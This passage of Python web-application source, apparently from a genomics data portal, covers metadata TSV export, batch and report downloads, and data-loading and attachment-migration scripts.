header.append(prop)
for param_field in TSV_MAPPING[prop][1]:
add_field_to_search_params(TSV_MAPPING[prop][0], param_field)
for itemType in EXTRA_FIELDS:
for param_field in EXTRA_FIELDS[itemType]:
add_field_to_search_params(itemType, param_field)
# Ensure we send accessions to ES to help narrow initial result down.
# If too many accessions to include in /search/ URL (exceeds 2048 characters, aka accessions for roughly 20 files), we'll fetch search query as-is and then filter/narrow down.
#if accession_triples and len(accession_triples) < 20:
# search_params['accession'] = [ triple[0] for triple in accession_triples ]
# search_params['experiments_in_set.accession'] = [ triple[1] for triple in accession_triples ]
# search_params['experiments_in_set.files.accession'] = [ triple[2] for triple in accession_triples ]
file_cache = {} # Exclude URLs of prev-encountered file(s).
summary = {
'counts' : {
'Files Selected for Download' : len(accession_triples) if accession_triples else None,
'Total Files' : 0,
'Total Unique Files to Download' : 0
},
'lists' : {
'Not Available' : [],
'Duplicate Files' : [],
'Extra Files' : [],
'Reference Files' : []
}
}
exp_raw_file_cache = {} # experiments that have processed files selected for download (it is used to decide whether to include ref files or not)
if filename_to_suggest is None:
filename_to_suggest = 'metadata_' + datetime.utcnow().strftime('%Y-%m-%d-%Hh-%Mm') + '.tsv'
def get_values_for_field(item, field, remove_duplicates=True):
c_value = []
if remove_duplicates:
for value in simple_path_ids(item, field):
if str(value) not in c_value:
c_value.append(str(value))
return list(set(c_value))
else:
for value in simple_path_ids(item, field):
c_value.append(str(value))
return c_value
def get_value_for_column(item, col):
temp = []
for c in TSV_MAPPING[col][1]:
c_value = get_values_for_field(item, c, TSV_MAPPING[col][2])
if len(temp):
if len(c_value):
temp = [x + ' ' + c_value[0] for x in temp]
else:
temp = c_value
if TSV_MAPPING[col][2]:
return ', '.join(list(set(temp)))
else:
return ', '.join(temp)
def get_correct_rep_no(column_name, column_vals_dict, experiment_set):
'''Find which Replicate Exp our File Row Object belongs to, and return its replicate number.'''
if column_vals_dict is None or column_name is None:
return None
def get_val(find_exp_accession):
for repl_exp in experiment_set.get('replicate_exps',[]):
repl_exp_accession = repl_exp.get('replicate_exp', {}).get('accession', None)
if repl_exp_accession is not None and repl_exp_accession == find_exp_accession:
rep_key = 'bio_rep_no' if column_name == 'Bio Rep No' else 'tec_rep_no'
return str(repl_exp.get(rep_key))
return None
experiment_accession = column_vals_dict.get('Experiment Accession')
if experiment_accession:
if ',' not in experiment_accession:
return get_val(experiment_accession)
else:
vals = [ get_val(accession) for accession in experiment_accession.split(', ') if accession is not None and accession != 'NONE' ]
return ', '.join(filter(None, vals))
return None
def should_file_row_object_be_included(column_vals_dict):
'''Ensure row's ExpSet, Exp, and File accession are in list of accession triples sent in URL params.'''
if accession_triples is None:
return True
for set_accession, exp_accession, file_accession in accession_triples:
if (
(('Experiment Set Accession' in column_vals_dict and set_accession == column_vals_dict['Experiment Set Accession']) or set_accession == 'NONE') and
(('Experiment Accession' in column_vals_dict and exp_accession == column_vals_dict['Experiment Accession']) or exp_accession == 'NONE') and
(file_accession == column_vals_dict['File Accession'] or column_vals_dict['Related File Relationship'] == 'reference file for' or file_accession == 'NONE')
):
# if the file is a raw file (actually if classification is not processed file, then we assume it as a raw file),
# then add the related exp to the exp_raw_file_cache dict. to check
# whether to include exp's ref files since we will include ref files if at least one raw file
# is selected for download.
if exp_accession and len(column_vals_dict['File Classification']) > 0 and column_vals_dict['File Classification'] != 'processed file':
exp_raw_file_cache[exp_accession] = True
# include ref files if at least one raw file of the parent experiment is already selected for downloads, else discard it
if exp_accession and column_vals_dict['Related File Relationship'] == 'reference file for':
if exp_accession not in exp_raw_file_cache:
return False
return True
return False
def flatten_other_processed_files(other_processed_files):
flat_list = []
for opf in other_processed_files:
for f in opf.get('files', []):
flat_list.append(f)
return flat_list
def format_experiment_set(exp_set):
'''
:param exp_set: A dictionary representation of ExperimentSet as received from /search/ results.
:returns Iterable of dictionaries which represent File item rows, with column headers as keys.
'''
exp_set_row_vals = {}
exp_set_cols = [ col for col in header if TSV_MAPPING[col][0] == EXP_SET ]
for column in exp_set_cols:
exp_set_row_vals[column] = get_value_for_column(exp_set, column)
def sort_files_from_expset_by_replicate_numbers(file_dict):
try:
bio_rep_no = int(file_dict['Bio Rep No'])
except Exception:
bio_rep_no = 999
try:
tec_rep_no = int(file_dict['Tech Rep No'])
except Exception:
tec_rep_no = 999
return bio_rep_no * 100000 + tec_rep_no
# Flatten map's child result maps up to self.
return sorted(chain(
chain.from_iterable(
map(
lambda exp: format_experiment(exp, exp_set, exp_set_row_vals),
exp_set.get('experiments_in_set', [])
)
),
chain.from_iterable(
map(
lambda f: format_file(f, exp_set, dict(exp_set_row_vals, **{ 'Experiment Accession' : 'NONE' }), exp_set, exp_set_row_vals),
exp_set.get('processed_files', []) + flatten_other_processed_files(exp_set.get('other_processed_files', []))
)
)
), key=sort_files_from_expset_by_replicate_numbers)
def format_experiment(exp, exp_set, exp_set_row_vals):
'''
:returns Iterable of dictionaries which represent File item rows, with column headers as keys.
'''
exp_row_vals = {}
exp_cols = [ col for col in header if TSV_MAPPING[col][0] == EXP ]
for column in exp_cols:
exp_row_vals[column] = get_value_for_column(exp, column)
return chain(
chain.from_iterable(
map(
lambda f: format_file(f, exp, exp_row_vals, exp_set, exp_set_row_vals),
sorted(exp.get('files', []), key=lambda d: d.get("accession")) + sorted(exp.get('processed_files', []), key=lambda d: d.get("accession")) + sorted(flatten_other_processed_files(exp.get('other_processed_files', [])), key=lambda d: d.get("accession"))
)
),
# ref files should be iterated after the end of exp's raw and
# processed files iteration since we do decision whether to include the ref. files or not
chain.from_iterable(
map(
lambda f: format_file(dict(f, **{ 'reference_file_for' : exp.get('accession') }), exp, exp_row_vals, exp_set, exp_set_row_vals),
sorted(exp.get('reference_files', []), key=lambda d: d.get("accession"))
)
)
)
def format_file(f, exp, exp_row_vals, exp_set, exp_set_row_vals):
'''
:returns List of dictionaries which represent File item rows, with column headers as keys.
'''
files_returned = [] # Function output
f['href'] = request.host_url + f.get('href', '')
f_row_vals = {}
file_cols = [ col for col in header if TSV_MAPPING[col][0] == FILE or TSV_MAPPING[col][0] == FILE_ONLY ]
for column in file_cols:
f_row_vals[column] = get_value_for_column(f, column)
all_row_vals = dict(exp_set_row_vals, **dict(exp_row_vals, **f_row_vals)) # Combine data from ExpSet, Exp, and File
# Some extra fields to decide whether to include exp's reference files or not
#
# IMPORTANT: since we add the Supplementary Files download option in Exp Set, users can download reference files directly.
# So directly downloaded reference files should not be considered as 'reference file for' of an experiment)
        if (not accession_triples or not any(triple[2] == f.get('accession', '') for triple in accession_triples)) and 'reference_file_for' in f:
all_row_vals['Related File Relationship'] = 'reference file for'
all_row_vals['Related File'] = 'Experiment - ' + f.get('reference_file_for', '')
if not all_row_vals.get('File Classification'):
all_row_vals['File Classification'] = f.get('file_classification', '')
# If no EXP properties, likely is processed file from an ExpSet, so show all Exps' values.
exp_col_names = [ k for k,v in TSV_MAPPING.items() if v[0] == EXP ]
for column in exp_col_names:
if all_row_vals.get(column) is None or ('Accession' in column and all_row_vals.get(column) == 'NONE'):
vals = []
for field in TSV_MAPPING[column][1]:
vals.append(', '.join(get_values_for_field(exp_set, 'experiments_in_set.' + field)))
all_row_vals[column] = ', '.join(vals)
# Add Bio & Tech Rep Nos re: all_row_vals['Experiment Accession']
all_row_vals['Tech Rep No'] = get_correct_rep_no('Tech Rep No', all_row_vals, exp_set)
all_row_vals['Bio Rep No'] = get_correct_rep_no('Bio Rep No', all_row_vals, exp_set)
# If we do not have any publication info carried over from ExpSet, list out lab.correspondence instead
if not all_row_vals.get('Publication'):
lab_correspondence = exp_set.get('lab', {}).get('correspondence', [])
if len(lab_correspondence) > 0:
contact_emails = []
for contact in lab_correspondence:
decoded_email = b64decode(contact['contact_email'].encode('utf-8')).decode('utf-8') if contact.get('contact_email') else None
if decoded_email:
contact_emails.append(decoded_email)
all_row_vals['Publication'] = "Correspondence: " + ", ".join(contact_emails)
# Add file to our return list which is to be bubbled upwards to iterable.
files_returned.append(all_row_vals)
# Add attached secondary files, if any; copies most values over from primary file & overrides distinct File Download URL, md5sum, etc.
if f.get('extra_files') and len(f['extra_files']) > 0:
for xfile in f['extra_files']:
if xfile.get('use_for') == 'visualization':
continue
xfile_vals = all_row_vals.copy()
xfile_vals['File Download URL'] = request.host_url + xfile['href'] if xfile.get('href') else None
xfile_vals['File Format'] = xfile.get('file_format', {}).get('display_title')
xfile_vals['md5sum'] = xfile.get('md5sum')
xfile_vals['Size (MB)'] = xfile.get('file_size')
xfile_vals['Related File Relationship'] = 'secondary file for'
xfile_vals['Related File'] = all_row_vals.get('File Accession')
files_returned.append(xfile_vals)
return files_returned
def post_process_file_row_dict(file_row_dict_tuple):
idx, file_row_dict = file_row_dict_tuple
if file_row_dict['Related File Relationship'] == 'secondary file for':
summary['lists']['Extra Files'].append(('Secondary file for ' + file_row_dict.get('Related File', 'unknown file.'), file_row_dict ))
elif file_row_dict['Related File Relationship'] == 'reference file for':
summary['lists']['Reference Files'].append(('Reference file for ' + file_row_dict.get('Related File', 'unknown exp.'), file_row_dict ))
if not file_row_dict['File Type']:
file_row_dict['File Type'] = 'other'
if file_row_dict['File Download URL'] is None:
file_row_dict['File Download URL'] = '### No URL currently available'
summary['counts']['Total Files'] += 1
summary['lists']['Not Available'].append(('No URL available', file_row_dict ))
return file_row_dict
if file_cache.get(file_row_dict['File Download URL']) is not None:
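            # +3 maps the 0-based data-row index to its 1-based line number in the TSV (intro and header lines precede the data)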
row_num_duplicated = file_cache[file_row_dict['File Download URL']] + 3
file_row_dict['File Download URL'] = '### Duplicate of row ' + str(row_num_duplicated) + ': ' + file_row_dict['File Download URL']
summary['counts']['Total Files'] += 1
summary['lists']['Duplicate Files'].append(('Duplicate of row ' + str(row_num_duplicated), file_row_dict ))
return file_row_dict
# remove repeating/redundant lab info in Contributing Lab
if (file_row_dict['Contributing Lab'] is not None and file_row_dict['Contributing Lab'] != '' and
(file_row_dict['Contributing Lab'] == file_row_dict['Experimental Lab'] or
file_row_dict['Contributing Lab'] == file_row_dict['Generating Lab'])):
file_row_dict['Contributing Lab'] = ''
file_cache[file_row_dict['File Download URL']] = idx
if('Size (MB)' in file_row_dict and file_row_dict['Size (MB)'] != None and file_row_dict['Size (MB)'] != ''):
file_row_dict['Size (MB)'] = format(
float(file_row_dict['Size (MB)']) / (1024 * 1024), '.2f')
if file_row_dict['File Status'] in ['uploading', 'to be uploaded', 'upload failed']:
file_row_dict['File Download URL'] = '### Not Yet Uploaded: ' + file_row_dict['File Download URL']
summary['counts']['Total Files'] += 1
summary['lists']['Not Available'].append(('Not yet uploaded', file_row_dict ))
return file_row_dict
if file_row_dict['File Status'] == 'restricted':
file_row_dict['File Download URL'] = '### Restricted: ' + file_row_dict['File Download URL']
summary['counts']['Total Files'] += 1
summary['lists']['Not Available'].append(('Restricted', file_row_dict ))
return file_row_dict
summary['counts']['Total Unique Files to Download'] += 1
summary['counts']['Total Files'] += 1
return file_row_dict
def format_filter_resulting_file_row_dicts(file_row_dict_iterable):
return map(
post_process_file_row_dict,
enumerate(filter(should_file_row_object_be_included, file_row_dict_iterable))
)
def generate_summary_lines():
ret_rows = [
['###', '', ''],
['###', 'Summary', ''],
['###', '', ''],
['###', 'Files Selected for Download:', '', '', str(summary['counts']['Files Selected for Download'] or 'All'), ''],
['###', 'Total File Rows:', '', '', str(summary['counts']['Total Files']), ''],
['###', 'Unique Downloadable Files:', '', '', str(summary['counts']['Total Unique Files to Download']), '']
]
def gen_mini_table(file_tuples):
for idx, file_tuple in enumerate(file_tuples[0:5]):
ret_rows.append(['###', ' - Details:' if idx == 0 else '', file_tuple[1]['File Accession'] + '.' + file_tuple[1]['File Format'], file_tuple[0] ])
if len(file_tuples) > 5:
ret_rows.append(['###', '', 'and ' + str(len(file_tuples) - 5) + ' more...', ''])
if len(summary['lists']['Extra Files']) > 0:
ret_rows.append(['###', '- Added {} extra file{} which {} attached to a primary selected file (e.g. pairs_px2 index file with a pairs file):'.format(str(len(summary['lists']['Extra Files'])), 's' if len(summary['lists']['Extra Files']) > 1 else '', 'are' if len(summary['lists']['Extra Files']) > 1 else 'is'), '', '', '', ''])
gen_mini_table(summary['lists']['Extra Files'])
if len(summary['lists']['Reference Files']) > 0:
ret_rows.append(['###', '- Added {} reference file{} which {} attached to an experiment:'.format(str(len(summary['lists']['Reference Files'])), 's' if len(summary['lists']['Reference Files']) > 1 else '', 'are' if len(summary['lists']['Reference Files']) > 1 else 'is'), '', '', '', ''])
gen_mini_table(summary['lists']['Reference Files'])
if len(summary['lists']['Duplicate Files']) > 0:
ret_rows.append(['###', '- Commented out {} duplicate file{} (e.g. a raw file shared by two experiments):'.format(str(len(summary['lists']['Duplicate Files'])), 's' if len(summary['lists']['Duplicate Files']) > 1 else ''), '', '', '', ''])
gen_mini_table(summary['lists']['Duplicate Files'])
if len(summary['lists']['Not Available']) > 0:
ret_rows.append(['###', '- Commented out {} file{} which are currently not available (i.e. file restricted, or not yet finished uploading):'.format(str(len(summary['lists']['Not Available'])), 's' if len(summary['lists']['Not Available']) > 1 else ''), '', '', '', ''])
gen_mini_table(summary['lists']['Not Available'])
# add unauthenticated download is not permitted warning
ret_rows.append(['###', '', '', '', '', '', ''])
ret_rows.append(['###', 'IMPORTANT: As of October 15, 2020, you must include an access key in your cURL command for bulk downloads. You can configure the access key in your profile. If you do not already have an account, you can log in with your Google or GitHub credentials.', '', '', '', ''])
return ret_rows
def stream_tsv_output(file_row_dictionaries):
'''
        Generator which converts file-metadata dictionaries into a TSV stream.
:param file_row_dictionaries: Iterable of dictionaries, each containing TSV_MAPPING keys and values from a file in ExperimentSet.
'''
line = DummyFileInterfaceImplementation()
writer = csv.writer(line, delimiter='\t')
# Initial 2 lines: Intro, Headers
writer.writerow([
'###', 'N.B.: File summary located at bottom of TSV file.', '', '', '', '',
'Suggested command to download: ', '', '', 'cut -f 1 ./{} | tail -n +3 | grep -v ^# | xargs -n 1 curl -O -L --user <access_key_id>:<access_key_secret>'.format(filename_to_suggest)
])
yield line.read().encode('utf-8')
writer.writerow([column.strip() for column in header])
yield line.read().encode('utf-8')
for file_row_dict in file_row_dictionaries:
writer.writerow([ file_row_dict.get(column) or 'N/A' for column in header ])
yield line.read().encode('utf-8')
for summary_line in generate_summary_lines():
writer.writerow(summary_line)
yield line.read().encode('utf-8')
if not endpoints_initialized['metadata']: # For some reason first result after bootup returns empty, so we do once extra for first request.
initial_path = '{}?{}'.format(search_path, urlencode(dict(search_params, limit=10), True))
endpoints_initialized['metadata'] = True
request.invoke_subrequest(make_search_subreq(request, initial_path), False)
# Prep - use dif functions if different type requested.
if search_params['type'][0:13] == 'ExperimentSet':
iterable_pipeline = format_filter_resulting_file_row_dicts(
chain.from_iterable(
map(
format_experiment_set,
get_iterable_search_results(request, search_path, search_params)
)
)
)
elif search_params['type'][0:4] == 'File' and search_params['type'][4:7] != 'Set':
iterable_pipeline = format_filter_resulting_file_row_dicts(
chain.from_iterable(
map(
lambda f: format_file(f, {}, {}, {}, {}),
get_iterable_search_results(request, search_path, search_params)
)
)
)
else:
raise HTTPBadRequest("Metadata can only be retrieved currently for Experiment Sets or Files. Received \"" + search_params['type'] + "\"")
return Response(
content_type='text/tsv',
app_iter = stream_tsv_output(iterable_pipeline),
content_disposition='attachment;filename="%s"' % filename_to_suggest
)
@view_config(route_name="metadata_redirect", request_method='GET')
@debug_log
def redirect_new_metadata_route(context, request):
return HTTPMovedPermanently(
location='/metadata/?' + request.matchdict['search_params'],
comment="Redirected to current metadata route."
)
@view_config(route_name='batch_download', request_method='GET')
@debug_log
def batch_download(context, request):
# adding extra params to get required columns
param_list = parse_qs(request.matchdict['search_params'])
param_list['field'] = ['files.href', 'files.file_type']
param_list['limit'] = ['all']
path = '/search/?%s' % urlencode(param_list, True)
results = request.embed(path, as_user=True)
metadata_link = '{host_url}/metadata/{search_params}/metadata.tsv'.format(
host_url=request.host_url,
search_params=request.matchdict['search_params']
)
files = [metadata_link]
if 'files.file_type' in param_list:
for exp in results['@graph']:
for f in exp['files']:
if f['file_type'] in param_list['files.file_type']:
files.append('{host_url}{href}'.format(
host_url=request.host_url,
href=f['href']
))
else:
for exp in results['@graph']:
for f in exp['files']:
files.append('{host_url}{href}'.format(
host_url=request.host_url,
href=f['href']
))
return Response(
content_type='text/plain',
body='\n'.join(files),
content_disposition='attachment; filename="%s"' % 'files.txt'
)
def lookup_column_value(value, path):
nodes = [value]
names = path.split('.')
for name in names:
nextnodes = []
for node in nodes:
if name not in node:
continue
value = node[name]
if isinstance(value, list):
nextnodes.extend(value)
else:
nextnodes.append(value)
nodes = nextnodes
if not nodes:
return ''
# if we ended with an embedded object, show the @id
if nodes and hasattr(nodes[0], '__contains__') and '@id' in nodes[0]:
nodes = [node['@id'] for node in nodes]
seen = set()
deduped_nodes = [n for n in nodes if not (n in seen or seen.add(n))]
return u','.join(u'{}'.format(n) for n in deduped_nodes)
def format_row(columns):
"""Format a list of text columns as a tab-separated byte string."""
return b'\t'.join([bytes_(c, 'utf-8') for c in columns]) + b'\r\n'
@view_config(route_name='report_download', request_method='GET')
@debug_log
def report_download(context, request):
types = request.params.getall('type')
if len(types) != 1:
msg = 'Report view requires specifying a single type.'
raise HTTPBadRequest(explanation=msg)
the_type = types[0]
# Make sure we get all results
request.GET['limit'] = 'all'
    the_schema = [request.registry[TYPES][the_type].schema]
columns = build_table_columns(request, the_schema, [the_type])
header = [column.get('title') or field for field, column in columns.items()]
def generate_rows():
yield format_row(header)
for item in iter_search_results(context, request):
values = [lookup_column_value(item, path) for path in columns]
yield format_row(values)
# Stream response using chunked encoding.
request.response.content_type = 'text/tsv'
request.response.content_disposition = 'attachment;filename="%s"' % 'report.tsv'
request.response.app_iter = generate_rows()
return request.response
```
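The `DummyFileInterfaceImplementation` / `stream_tsv_output` pair above streams the TSV one row at a time instead of building the whole file in memory. A minimal sketch of that pattern in isolation (the class name and row values here are illustrative, not part of the module):

```python
import csv


class OneLineBuffer(object):
    """Single-line sink: csv.writer writes one row, the caller reads it back immediately."""
    def __init__(self):
        self._line = None

    def write(self, line):
        self._line = line

    def read(self):
        return self._line


def stream_rows(rows):
    # Yield each row as encoded TSV bytes, suitable for use as a chunked response body.
    buf = OneLineBuffer()
    writer = csv.writer(buf, delimiter='\t')
    for row in rows:
        writer.writerow(row)
        yield buf.read().encode('utf-8')


for chunk in stream_rows([["accession", "size_mb"], ["4DNFIEXAMPLE", "12.50"]]):
    print(chunk)
```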
#### File: encoded/commands/load_data.py
```python
import argparse
import logging
import structlog
from dcicutils.env_utils import permit_load_data
from pyramid.paster import get_app
from pyramid.path import DottedNameResolver
from .. import configure_dbsession
log = structlog.getLogger(__name__)
EPILOG = __doc__
def load_data_should_proceed(env, allow_prod):
""" Returns True on whether or not load_data should proceed.
:param env: env we are on
:param allow_prod: prod argument from argparse, defaults to False
:return: True if load_data should continue, False otherwise
"""
return permit_load_data(envname=env, allow_prod=allow_prod, orchestrated_app='fourfront')
# # do not run on a production environment unless we set --prod flag
# if is_stg_or_prd_env(env) and not allow_prod:
# log.info('load_data: skipping, since we are on a production environment and --prod not used')
# return False
#
# # do not run on hotseat since it is a prod snapshot
# if 'hotseat' in env:
# log.info('load_data: skipping, since we are on hotseat')
# return False
#
# return True
def main():
logging.basicConfig()
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('encoded').setLevel(logging.DEBUG)
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description="Load Test Data", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument('config_uri', help="path to configfile")
parser.add_argument('--prod', action='store_true',
help="must be set to confirm this action is intended to happen on a production server")
parser.add_argument('--overwrite', action='store_true',
help="must be set to update existing uuids with patch")
args = parser.parse_args()
# get the pyramids app
app = get_app(args.config_uri, args.app_name)
# create db schema
configure_dbsession(app)
env = app.registry.settings.get('env.name', '')
load_test_data = app.registry.settings.get('load_test_data')
allow_prod = args.prod
log.info("load_data: load_test_data function is %s" % (load_test_data))
load_test_data = DottedNameResolver().resolve(load_test_data)
if load_data_should_proceed(env, allow_prod):
load_test_data(app, args.overwrite)
if __name__ == "__main__":
main()
```
#### File: encoded/commands/migrate_attachments_aws.py
```python
import copy
import logging
import transaction
from hashlib import md5
from pyramid.paster import get_app
from pyramid.threadlocal import manager
from pyramid.testing import DummyRequest
from snovault.interfaces import (
BLOBS,
DBSESSION
)
from snovault.storage import (
PropertySheet,
RDBBlobStorage,
)
EPILOG = __doc__
logger = logging.getLogger(__name__)
def run(app):
root = app.root_factory(app)
dummy_request = DummyRequest(root=root, registry=app.registry, _stats={})
manager.push({'request': dummy_request, 'registry': app.registry})
session = app.registry[DBSESSION]()
blob_storage = app.registry[BLOBS]
rdb_blobs = RDBBlobStorage(app.registry[DBSESSION])
for sheet in session.query(PropertySheet).filter(PropertySheet.name == 'downloads'):
# Copy the properties so sqlalchemy realizes it changed after it's mutated
properties = copy.deepcopy(sheet.properties)
download_meta = properties['attachment']
if 'bucket' not in download_meta:
# Re-writing the blob while the S3BlobStorage is in use
# will move it to S3.
data = rdb_blobs.get_blob(download_meta)
blob_id = download_meta.pop('blob_id')
download_meta['md5sum'] = md5(data).hexdigest()
blob_storage.store_blob(data, download_meta, blob_id=blob_id)
sheet.properties = properties
logger.info('Updated %s' % sheet.sid)
def main():
import argparse
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description="Move attachment blobs to S3", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument('--abort', action='store_true', help="Rollback transaction")
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
logging.basicConfig()
app = get_app(args.config_uri, args.app_name)
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('encoded').setLevel(logging.DEBUG)
raised = False
try:
run(app)
except Exception:
raised = True
raise
finally:
if raised or args.abort:
transaction.abort()
logger.info('Rolled back.')
else:
transaction.commit()
if __name__ == '__main__':
main()
```
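The `run` loop above relies on a common SQLAlchemy idiom: deep-copy the JSON properties, mutate the copy, then reassign the whole attribute so the ORM's change tracking notices the update. A standalone sketch of that shape (the `FakeSheet` stand-in and blob payload are hypothetical):

```python
import copy
from hashlib import md5


class FakeSheet(object):
    """Stand-in for a PropertySheet row; the real object is ORM-mapped."""
    def __init__(self, properties):
        self.properties = properties


sheet = FakeSheet({'attachment': {'blob_id': 'abc-123', 'download': 'report.pdf'}})
data = b'%PDF-1.4 example payload'  # hypothetical blob contents

properties = copy.deepcopy(sheet.properties)      # copy, never mutate in place
download_meta = properties['attachment']
blob_id = download_meta.pop('blob_id')            # blob id moves out of the metadata
download_meta['md5sum'] = md5(data).hexdigest()   # checksum recorded alongside
sheet.properties = properties                     # reassign so the change is detected
print(blob_id, sheet.properties)
```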
#### File: encoded/commands/run_upgrader_on_inserts.py
```python
import argparse
import logging
import json
from pkg_resources import resource_filename
logger = logging.getLogger(__name__)
EPILOG = __doc__
def get_inserts(inserts_folder_name='inserts', inserts_file_name='workflow'):
folder_name = resource_filename('encoded', 'tests/data/' + inserts_folder_name + '/')
f_name = folder_name + inserts_file_name + '.json'
with open(f_name) as f:
items = json.loads(f.read())
for insert_item in items:
yield insert_item
def main():
logging.basicConfig()
# Loading app will have configured from config file. Reconfigure here:
logging.getLogger('encoded').setLevel(logging.DEBUG)
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description="Run inserts through an upgrader", epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--inserts-folder', help="Folder to use to get the file of inserts from. E.g. 'master-inserts' or 'inserts'. Defaults to 'inserts'.")
parser.add_argument('item_type', help="Type of item or filename of inserts, in lowercase/schema-filename form, e.g. 'page', 'static_section'.")
parser.add_argument('upgrader_method_name', help="Name of upgrader method to use as it is defined in upgrade/<item_type> folder, e.g. 'workflow_3_4'.")
args = parser.parse_args()
upgrader_module = __import__('encoded.upgrade.' + args.item_type, fromlist=[''])
upgrader_fxn = getattr(upgrader_module, args.upgrader_method_name)
results = []
for item in get_inserts(args.inserts_folder or 'inserts', args.item_type):
upgrader_fxn(item, None) # Modifies in place
results.append(item)
print(json.dumps(results, indent=4, sort_keys=True)) # Return instead of print?
if __name__ == "__main__":
main()
```
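`main` above resolves the upgrader function dynamically from its dotted module path. The same lookup pattern in isolation, demonstrated against the standard library (the real script imports from `encoded.upgrade.<item_type>` instead):

```python
import importlib


def resolve(dotted_module, attr_name):
    """Import a module by dotted name, then fetch an attribute from it."""
    return getattr(importlib.import_module(dotted_module), attr_name)


# Standalone demonstration with stdlib names; swap in an item type and
# upgrader method name when the encoded package is importable.
dumps = resolve('json', 'dumps')
print(dumps({'upgraded': True}))
```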
#### File: src/encoded/loadxl.py
```python
import json
import magic
import mimetypes
import os
import structlog
import webtest
from base64 import b64encode
from dcicutils.misc_utils import ignored
from PIL import Image
from pkg_resources import resource_filename
from pyramid.paster import get_app
from pyramid.response import Response
from pyramid.view import view_config
from snovault.util import debug_log
from .server_defaults import add_last_modified
text = type(u'')
logger = structlog.getLogger(__name__)
def includeme(config):
# provide an endpoint to do bulk uploading that just uses loadxl
config.add_route('load_data', '/load_data')
config.scan(__name__)
# order of items references with linkTo in a field in 'required' in schemas
ORDER = [
'user',
'award',
'lab',
'file_format',
'ontology',
'ontology_term', # validate_biosource_cell_line requires term_name
'experiment_type',
'biosource',
'biosample',
'organism', # allow the 'default' linkTo in individuals work
'workflow',
'vendor',
]
IS_ATTACHMENT = [
'attachment',
'file_format_specification',
]
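# user uuid recorded as the modifier when loadxl patches items (passed to add_last_modified below)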
LOADXL_USER_UUID = "3202fd57-44d2-44fb-a131-afb1e43d8ae5"
class LoadGenWrapper(object):
"""
Simple class that accepts a generator function and handles errors by
setting self.caught to the error message.
"""
def __init__(self, gen):
self.gen = gen
self.caught = None
def __iter__(self):
"""
Iterate through self.gen and see if 'ERROR: ' bytes are in any yielded
value. If so, store the error message as self.caught and raise
StopIteration to halt the generator.
"""
# self.caught = yield from self.gen
for iter_val in self.gen:
if b'ERROR:' in iter_val:
self.caught = iter_val.decode()
yield iter_val
def close(self):
if self.caught:
logger.error('load_data: failed to load with iter_response', error=self.caught)
@view_config(route_name='load_data', request_method='POST', permission='add')
@debug_log
def load_data_view(context, request):
"""
expected input data
{'local_path': path to a directory or file in file system
'fdn_dir': inserts folder under encoded
'store': if not local_path or fdn_dir, look for a dictionary of items here
'overwrite' (Bool): overwrite if existing data
    'itype': (list or str): only pick some types from the source, or specify the item type when loading a single input file
'iter_response': invoke the Response as an app_iter, directly calling load_all_gen
'config_uri': user supplied configuration file}
post can contain 2 different styles of data
1) reference to a folder or file (local_path or fd_dir). If this is done
itype can be optionally used to specify type of items loaded from files
2) store in form of {'item_type': [items], 'item_type2': [items]}
item_type should be same as insert file names i.e. file_fastq
"""
ignored(context)
    # this is a bit weird but want to reuse load_data functionality so I'm rolling with it
config_uri = request.json.get('config_uri', 'production.ini')
patch_only = request.json.get('patch_only', False)
app = get_app(config_uri, 'app')
environ = {'HTTP_ACCEPT': 'application/json', 'REMOTE_USER': 'TEST'}
testapp = webtest.TestApp(app, environ)
# expected response
request.response.status = 200
result = {
'status': 'success',
'@type': ['result'],
}
store = request.json.get('store', {})
local_path = request.json.get('local_path')
fdn_dir = request.json.get('fdn_dir')
overwrite = request.json.get('overwrite', False)
itype = request.json.get('itype')
iter_resp = request.json.get('iter_response', False)
inserts = None
from_json = False
if fdn_dir:
inserts = resource_filename('encoded', 'tests/data/' + fdn_dir + '/')
elif local_path:
inserts = local_path
elif store:
inserts = store
from_json = True
# if we want to iterate over the response to keep the connection alive
# this directly calls load_all_gen, instead of load_all
if iter_resp:
return Response(
content_type='text/plain',
app_iter=LoadGenWrapper(
load_all_gen(testapp, inserts, None, overwrite=overwrite,
itype=itype, from_json=from_json, patch_only=patch_only)
)
)
# otherwise, it is a regular view and we can call load_all as usual
if inserts:
res = load_all(testapp, inserts, None, overwrite=overwrite, itype=itype, from_json=from_json)
else:
res = 'No uploadable content found!'
if res: # None if load_all is successful
print(LOAD_ERROR_MESSAGE)
request.response.status = 422
result['status'] = 'error'
result['@graph'] = str(res)
return result
def trim(value):
"""Shorten excessively long fields in error log."""
if isinstance(value, dict):
return {k: trim(v) for k, v in value.items()}
if isinstance(value, list):
return [trim(v) for v in value]
if isinstance(value, str) and len(value) > 160:
return value[:77] + '...' + value[-80:]
return value
def find_doc(docsdir, filename):
"""tries to find the file, if not returns false."""
path = None
if not docsdir:
return
for dirpath in docsdir:
candidate = os.path.join(dirpath, filename)
if not os.path.exists(candidate):
continue
if path is not None:
msg = 'Duplicate filenames: %s, %s' % (path, candidate)
raise ValueError(msg)
path = candidate
if path is None:
return
return path
def attachment(path):
"""Create an attachment upload object from a filename Embeds the attachment as a data url."""
filename = os.path.basename(path)
mime_type, encoding = mimetypes.guess_type(path)
major, minor = mime_type.split('/')
try:
detected_type = magic.from_file(path, mime=True).decode('ascii')
except AttributeError:
detected_type = magic.from_file(path, mime=True)
# XXX This validation logic should move server-side.
if not (detected_type == mime_type or
detected_type == 'text/plain' and major == 'text'):
raise ValueError('Wrong extension for %s: %s' % (detected_type, filename))
with open(path, 'rb') as stream:
attach = {'download': filename,
'type': mime_type,
'href': 'data:%s;base64,%s' % (mime_type, b64encode(stream.read()).decode('ascii'))}
if mime_type in ('application/pdf', "application/zip", 'text/plain',
'text/tab-separated-values', 'text/html', 'application/msword', 'application/vnd.ms-excel',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'):
